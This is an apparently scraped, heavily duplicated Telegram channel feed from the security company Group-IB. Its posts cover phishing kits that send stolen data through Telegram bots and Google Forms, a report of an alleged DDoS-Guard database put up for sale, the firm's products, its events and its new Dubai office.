#phishing #bots
Telegram bots and Google Forms make an appearance in phishing schemes
🐠A phishing kit is a toolset that helps create and operate phishing web pages that mimic a specific company or even several at once. They are usually sold on underground forums and are a way to effortlessly build infrastructure for large-scale phishing campaigns. By extracting the kits, cybersecurity analysts can identify the mechanism used to carry out the phishing attack and figure out where the stolen data is sent. In addition, a thorough examination of phishing kits helps analysts detect digital traces that might lead to the developers of the phishing kit.
🐠Group-IB specialists found that cybercriminals are beginning to use legitimate services such as Google Forms and Telegram to obtain user data stolen on phishing websites. This approach is a more safe solution and allows criminals to get the information immediately as opposed to previously using more complex tools such as dedicated e-mail accounts where one would first log in to obtain the data.
🐠In addition, ready-to-go platforms that automate phishing and which are available on the darknet have Telegram bots at their core, with admin panel that is used to manage the entire process of the phishing attack and keep financial records linked to them. Such platforms are distributed under the cybercrime-as-a-service model, which subsequently leads to more groups conducting attacks. They also widen the scope of cybercriminal activity.
Check out the full story on our website if you are curious to dive into our analysis and learn about the ways to protect your business from phishing attacks.
Telegram bots and Google Forms make an appearance in phishing schemes
🐠A phishing kit is a toolset that helps create and operate phishing web pages that mimic a specific company or even several at once. They are usually sold on underground forums and are a way to effortlessly build infrastructure for large-scale phishing campaigns. By extracting the kits, cybersecurity analysts can identify the mechanism used to carry out the phishing attack and figure out where the stolen data is sent. In addition, a thorough examination of phishing kits helps analysts detect digital traces that might lead to the developers of the phishing kit.
🐠Group-IB specialists found that cybercriminals are beginning to use legitimate services such as Google Forms and Telegram to obtain user data stolen on phishing websites. This approach is a more safe solution and allows criminals to get the information immediately as opposed to previously using more complex tools such as dedicated e-mail accounts where one would first log in to obtain the data.
🐠In addition, ready-to-go platforms that automate phishing and which are available on the darknet have Telegram bots at their core, with admin panel that is used to manage the entire process of the phishing attack and keep financial records linked to them. Such platforms are distributed under the cybercrime-as-a-service model, which subsequently leads to more groups conducting attacks. They also widen the scope of cybercriminal activity.
Check out the full story on our website if you are curious to dive into our analysis and learn about the ways to protect your business from phishing attacks.
Group-IB
Send to saved messages: cybercriminals use Telegram bots and Google Forms to automate phishing | Group-IB
Group-IB, a global threat hunting and adversary-centric cyber intelligence company, has found that cybercriminals increasingly often use legitimate services such as Google Forms and Telegram to obtain user data stolen during phishing attacks. Alternative…
#GIB_THF #HelpNetSecurity
Threat Hunting Framework: Help Net Security Review
🔹Help Net Security reviewed and tested our Threat Hunting Framework and published their conclusions in their new article.
🔹Make sure to give it a read if you are curious to know more about the testing process, framework’s components and the ultimate conclusion.
🔹Group-IB Threat Hunting Framework is a system for IT and OT networks that protects against unknown threats and targeted attacks, hunts for threats both within and outside the protected organization’s perimeter, and helps investigate and respond to cybersecurity incidents and minimize their impact.
Threat Hunting Framework: Help Net Security Review
🔹Help Net Security reviewed and tested our Threat Hunting Framework and published their conclusions in their new article.
🔹Make sure to give it a read if you are curious to know more about the testing process, framework’s components and the ultimate conclusion.
🔹Group-IB Threat Hunting Framework is a system for IT and OT networks that protects against unknown threats and targeted attacks, hunts for threats both within and outside the protected organization’s perimeter, and helps investigate and respond to cybersecurity incidents and minimize their impact.
Group-IB
Managed detection and response | Cybersecurity Products & Services - Group-IB
Group-IB Managed XDR uses EDR, NTA, Sandbox and email protection technologies to detect and disrupt malicious activity. Check out our services!
#education #daltonschool #amsterdam
Group-IB European team shares the cybersecurity basics and valuable tips with school students in Amsterdam!
🎓Dalton schools are becoming more popular around the world these days, but what exactly are they all about? Generally speaking, students bear a high level of independence as well as responsibility. Rather than constantly monitoring their progress, teachers simply outline a deadline for a project or an assignment. They can act as coaches, providing guidance upon request, but they never interfere before the deadline unless asked to do so. This is very similar to what many of us experience at work and it’s a great way to prepare for an adult life!
🏡Located in the Nieuw-West district of Amsterdam, Caland Lyceum is a perfect example of a Dalton School.
👨💼Our team, lead by Artyom Artyomov, Head of Digital Forensics Laboratory in Europe, gladly accepted the invitation to stop by for a lecture. Artyom touched down on a number of interesting topics such as
🔹cybercrime
🔹current threats
🔹how to protect yourself online
🔹what exactly is digital forensics
We knew we ended up in the right place straight away! All of the students were extremely interested in cybersecurity and closely listened to Artyom for more than an hour. This was followed by a series of straight-to-the point questions, including:
🔹how did Artyom end up in cybersecurity
🔹what’s the biggest case in his career
🔹how to protect yourself online when using a phone
🔹how effective antiviruses are these days
🔹what are the latest and most effective solutions to protect yourself from cybercriminals
💪We were very happy to encounter an audience so passionate about the topics we brought in and expand their knowledge on cybersecurity!
🌎Group-IB is excited to keep participating in education projects around the world, improving our common digital environment.
Group-IB European team shares the cybersecurity basics and valuable tips with school students in Amsterdam!
🎓Dalton schools are becoming more popular around the world these days, but what exactly are they all about? Generally speaking, students bear a high level of independence as well as responsibility. Rather than constantly monitoring their progress, teachers simply outline a deadline for a project or an assignment. They can act as coaches, providing guidance upon request, but they never interfere before the deadline unless asked to do so. This is very similar to what many of us experience at work and it’s a great way to prepare for an adult life!
🏡Located in the Nieuw-West district of Amsterdam, Caland Lyceum is a perfect example of a Dalton School.
👨💼Our team, lead by Artyom Artyomov, Head of Digital Forensics Laboratory in Europe, gladly accepted the invitation to stop by for a lecture. Artyom touched down on a number of interesting topics such as
🔹cybercrime
🔹current threats
🔹how to protect yourself online
🔹what exactly is digital forensics
We knew we ended up in the right place straight away! All of the students were extremely interested in cybersecurity and closely listened to Artyom for more than an hour. This was followed by a series of straight-to-the point questions, including:
🔹how did Artyom end up in cybersecurity
🔹what’s the biggest case in his career
🔹how to protect yourself online when using a phone
🔹how effective antiviruses are these days
🔹what are the latest and most effective solutions to protect yourself from cybercriminals
💪We were very happy to encounter an audience so passionate about the topics we brought in and expand their knowledge on cybersecurity!
🌎Group-IB is excited to keep participating in education projects around the world, improving our common digital environment.
#interview #award #sbr
An exclusive interview with Shafique Dawood, Group-IB Head of Sales and Business Development in APAC.
Last month, we were very excited and honored to receive the SBR Technology Excellence 2021 award for our Threat Intelligence & Attribution system. Shafique Dawood, Group-IB Head of Sales and Business Development in APAC was proud to accept the award in person as well as stop by for an interview discussing:
🔹What exactly is our Threat Intelligence & Attribution system and its distinguishing features
🔹What threats business can counter with the help of our Threat Intelligence & Attribution system
🔹Some of the international counter cybercrime operations Group-IB took part in
🔹Ransomware and how Group-IB expertise can play a vital role in countering the modern plague
Click here for more information about Group-IB Threat Intelligence & Attribution!
An exclusive interview with Shafique Dawood, Group-IB Head of Sales and Business Development in APAC.
Last month, we were very excited and honored to receive the SBR Technology Excellence 2021 award for our Threat Intelligence & Attribution system. Shafique Dawood, Group-IB Head of Sales and Business Development in APAC was proud to accept the award in person as well as stop by for an interview discussing:
🔹What exactly is our Threat Intelligence & Attribution system and its distinguishing features
🔹What threats business can counter with the help of our Threat Intelligence & Attribution system
🔹Some of the international counter cybercrime operations Group-IB took part in
🔹Ransomware and how Group-IB expertise can play a vital role in countering the modern plague
Click here for more information about Group-IB Threat Intelligence & Attribution!
YouTube
Group-IB wins SBR Technology Excellence 2021 award for Threat Intelligence & Attribution system
An exclusive interview with Shafique Dawood, Group-IB Head of Sales and Business Development in APAC.
Last month we were very excited and honored to receive the SBR Technology Excellence 2021 award for our Threat Intelligence & Attribution system. Shafique…
Last month we were very excited and honored to receive the SBR Technology Excellence 2021 award for our Threat Intelligence & Attribution system. Shafique…
#GISEC2021 #productshowcase
Group-IB is proud to take part in GISEC 2021!
Group-IB is very excited to take part in the largest showcase of cybersecurity solutions in the Middle East.
👨💼 Our Chief Technical Officer Dmitry Volkov will be taking over the X-lab stage on Monday at 2:30PM bringing along an exclusive showcase of Group-IB Threat Intelligence & Attribution system as well as our Threat Hunting Framework.
➡️ With cybercriminals constantly improving their methods simple detection is not enough. It is important to predict their probable courses of action and stay one step ahead by searching for threats and possible signs of an attack in the infrastructure.
➡️ Group-IB is here to step in with a number of essential solutions, such as:
🔹Group-IB Threat Intelligence & Attribution
🔹Systems for threat detection and threat hunting within and beyond the protected perimeter
Join Dimitry Volkov on Monday to learn more and don't forget to visit our stand # SS1-C12 with even more information about Group-IB innovative products, including our Fraud Hunting Platform and Digital Risk Protection.
📊 Make sure to stop by for some exciting cases and scenarios. We can’t wait to see you!
Group-IB is proud to take part in GISEC 2021!
Group-IB is very excited to take part in the largest showcase of cybersecurity solutions in the Middle East.
👨💼 Our Chief Technical Officer Dmitry Volkov will be taking over the X-lab stage on Monday at 2:30PM bringing along an exclusive showcase of Group-IB Threat Intelligence & Attribution system as well as our Threat Hunting Framework.
➡️ With cybercriminals constantly improving their methods simple detection is not enough. It is important to predict their probable courses of action and stay one step ahead by searching for threats and possible signs of an attack in the infrastructure.
➡️ Group-IB is here to step in with a number of essential solutions, such as:
🔹Group-IB Threat Intelligence & Attribution
🔹Systems for threat detection and threat hunting within and beyond the protected perimeter
Join Dimitry Volkov on Monday to learn more and don't forget to visit our stand # SS1-C12 with even more information about Group-IB innovative products, including our Fraud Hunting Platform and Digital Risk Protection.
📊 Make sure to stop by for some exciting cases and scenarios. We can’t wait to see you!
gisec.ae
GISEC GLOBAL | The World's Leading Cyber Security Exhibition | 5-7 May 2026
GISEC GLOBAL unites 25,000+ global InfoSec leaders, CISOs, & ethical hackers from 160 countries. Trusted by the world's top cybersecurity brands, empowering international collaboration & innovation.
#newoffice #groupib
Group-IB launches regional HQ in Dubai!
🌇 We have officially opened the Group-IB Middle East & Africa Threat Intelligence & Research Center in Dubai. This is a critical milestone toward achieving the strategic goal of building the first ever decentralized global cybersecurity company with fully operational R&D centers in the key financial hubs!
👨💼 The grand opening, held at the Habtoor Palace Dubai, was attended by representatives of the local financial organizations, government institutions, and the guest of honor, Mr. Craig Jones, INTERPOL Cybercrime director.
💪 The office would not only operate just as a sales hub but also as a full-scale regional HQ, offering all core technological competencies and bringing with it the top skills that are found across its global HQ in Singapore and other offices. The new center enables local community to leverage Group-IB’s in-depth knowledge of criminal schemes and close collaboration with international law enforcement and cyber police forces worldwide. The company’s battle-tested experts carried out more than 1,200 successful investigations over 18 years around the world enriching the Group-IB’s technology ecosystem with first-hand understanding of intrusion tactics used in most sophisticated cyberattacks.
💬“Zero tolerance to cybercriminals has brought us to the forefront of the global fight against online crime, — said Ilya Sachkov, Group-IB CEO and founder. “Dubai is a perfect place to carry on this mission together with local institutions and international law enforcement. As part of our contribution to building a vibrant cybersecurity ecosystem in the UAE, we plan to develop world-class research, monitoring, incident detection and response capabilities here in Dubai and adapt them to the needs of the market”, he added.
Group-IB launches regional HQ in Dubai!
🌇 We have officially opened the Group-IB Middle East & Africa Threat Intelligence & Research Center in Dubai. This is a critical milestone toward achieving the strategic goal of building the first ever decentralized global cybersecurity company with fully operational R&D centers in the key financial hubs!
👨💼 The grand opening, held at the Habtoor Palace Dubai, was attended by representatives of the local financial organizations, government institutions, and the guest of honor, Mr. Craig Jones, INTERPOL Cybercrime director.
💪 The office would not only operate just as a sales hub but also as a full-scale regional HQ, offering all core technological competencies and bringing with it the top skills that are found across its global HQ in Singapore and other offices. The new center enables local community to leverage Group-IB’s in-depth knowledge of criminal schemes and close collaboration with international law enforcement and cyber police forces worldwide. The company’s battle-tested experts carried out more than 1,200 successful investigations over 18 years around the world enriching the Group-IB’s technology ecosystem with first-hand understanding of intrusion tactics used in most sophisticated cyberattacks.
💬“Zero tolerance to cybercriminals has brought us to the forefront of the global fight against online crime, — said Ilya Sachkov, Group-IB CEO and founder. “Dubai is a perfect place to carry on this mission together with local institutions and international law enforcement. As part of our contribution to building a vibrant cybersecurity ecosystem in the UAE, we plan to develop world-class research, monitoring, incident detection and response capabilities here in Dubai and adapt them to the needs of the market”, he added.
#GIB_TIA
Group-IB has discovered a database allegedly belonging to a bulletproof hosting provider DDoS-Guard posted for sale on a cybercrime forum.
🔹The database supposedly contains information about DDoS-Guard’s customers, including their names, IP-addresses, and payment information. In addition to the database, the threat actor claims to have the source code of the DDoS-Guard’s infrastructure. The seller is currently auctioning the entire set at a starting price of $350,000.
🔹DDoS-Guard is a Russian online infrastructure services provider that in January 2021 helped Parler, a social media app, to return online after it had been refused web hosting services on the AWS platform. DDoS-Guard also provides computing capacities and obstructs the identification of website owners of hundreds of shady resources that are engaged in illicit goods sale, gambling, and copyright infringements.
🔹Group-IB Threat Intelligence & Attribution system detected the listing posted on May 26 on exploit[.]in, a popular hacker forum.
“Initially, the threat actor was auctioning off the lot with a starting price of $500,000. Shortly after the amount was reduced to $350,000,” says Oleg Dyorov, Threat Intelligence analyst at Group-IB. “The threat actor didn’t provide a sample of the database, which makes it impossible to verify the authenticity of the reported stolen database and the source code. The seller registered this account on exploit[.]in in January 2021 and has been looking to buy access to different corporate networks ever since. It is only the second time that they are trying to sell data on the forum. Despite the regular activity, the threat actor has no reputation on the forum and has made no deposits yet."
🔹According to Group-IB Threat Intelligence & Attribution system, this user previously had an account on exploit[.]in but was banned by the forum administrators as he refused to use the escrow service.
Group-IB has discovered a database allegedly belonging to a bulletproof hosting provider DDoS-Guard posted for sale on a cybercrime forum.
🔹The database supposedly contains information about DDoS-Guard’s customers, including their names, IP-addresses, and payment information. In addition to the database, the threat actor claims to have the source code of the DDoS-Guard’s infrastructure. The seller is currently auctioning the entire set at a starting price of $350,000.
🔹DDoS-Guard is a Russian online infrastructure services provider that in January 2021 helped Parler, a social media app, to return online after it had been refused web hosting services on the AWS platform. DDoS-Guard also provides computing capacities and obstructs the identification of website owners of hundreds of shady resources that are engaged in illicit goods sale, gambling, and copyright infringements.
🔹Group-IB Threat Intelligence & Attribution system detected the listing posted on May 26 on exploit[.]in, a popular hacker forum.
“Initially, the threat actor was auctioning off the lot with a starting price of $500,000. Shortly after the amount was reduced to $350,000,” says Oleg Dyorov, Threat Intelligence analyst at Group-IB. “The threat actor didn’t provide a sample of the database, which makes it impossible to verify the authenticity of the reported stolen database and the source code. The seller registered this account on exploit[.]in in January 2021 and has been looking to buy access to different corporate networks ever since. It is only the second time that they are trying to sell data on the forum. Despite the regular activity, the threat actor has no reputation on the forum and has made no deposits yet."
🔹According to Group-IB Threat Intelligence & Attribution system, this user previously had an account on exploit[.]in but was banned by the forum administrators as he refused to use the escrow service.
CyberScoop
Cybercrime forum advertises alleged database, source code from Russian firm that helped Parler
A seller on a popular cybercrime forum appears to be offering up source code and a database they say belongs to DDoS-Guard, the Russia-based hosting site that helped right-leaning social media company Parler get back online after Amazon Web Services banished…
#Dubai #GISEC2021
The last couple of days in Dubai have been absolutely incredible!
After a spectacular launch of our new Middle East & Africa HQ we decided to stay a while longer and take part in GISEC2021, the largest showcase of cybersecurity solutions in the region.
👨💼 The Group-IB squad, led by our CTO Dmitry Volkov, presented the full range of our products, as well as their features and innovative capabilities, including:
👉Network infrastructure protection
👉Adversary-centric detection of targeted attacks and unknown threats for IT and OT environments
👉Digital identity protection and fraud prevention in real time
👉 Mitigation of external digital risks to the company’s intellectual property and brand
⭐️ We were honored to receive so many visitors at our stand and even more excited to see so much people attend Dmitry’s speech at the X-Lab stage.
🌎 We are proud to have expanded our presence in the region. The opening of our brand-new office as well as our participation in GISEC2021 was an amazing experience becoming one of the bright highlights in Group-IB history!
🌇 Thank you so much to Dubai residents, visitors and everyone involved for making this possible and for an incredibly warm welcome!
The last couple of days in Dubai have been absolutely incredible!
After a spectacular launch of our new Middle East & Africa HQ we decided to stay a while longer and take part in GISEC2021, the largest showcase of cybersecurity solutions in the region.
👨💼 The Group-IB squad, led by our CTO Dmitry Volkov, presented the full range of our products, as well as their features and innovative capabilities, including:
👉Network infrastructure protection
👉Adversary-centric detection of targeted attacks and unknown threats for IT and OT environments
👉Digital identity protection and fraud prevention in real time
👉 Mitigation of external digital risks to the company’s intellectual property and brand
⭐️ We were honored to receive so many visitors at our stand and even more excited to see so much people attend Dmitry’s speech at the X-Lab stage.
🌎 We are proud to have expanded our presence in the region. The opening of our brand-new office as well as our participation in GISEC2021 was an amazing experience becoming one of the bright highlights in Group-IB history!
🌇 Thank you so much to Dubai residents, visitors and everyone involved for making this possible and for an incredibly warm welcome!
Telegram
Group-IB
#newoffice #groupib
Group-IB launches regional HQ in Dubai!
🌇 We have officially opened the Group-IB Middle East & Africa Threat Intelligence & Research Center in Dubai. This is a critical milestone toward achieving the strategic goal of building the first…
Group-IB launches regional HQ in Dubai!
🌇 We have officially opened the Group-IB Middle East & Africa Threat Intelligence & Research Center in Dubai. This is a critical milestone toward achieving the strategic goal of building the first…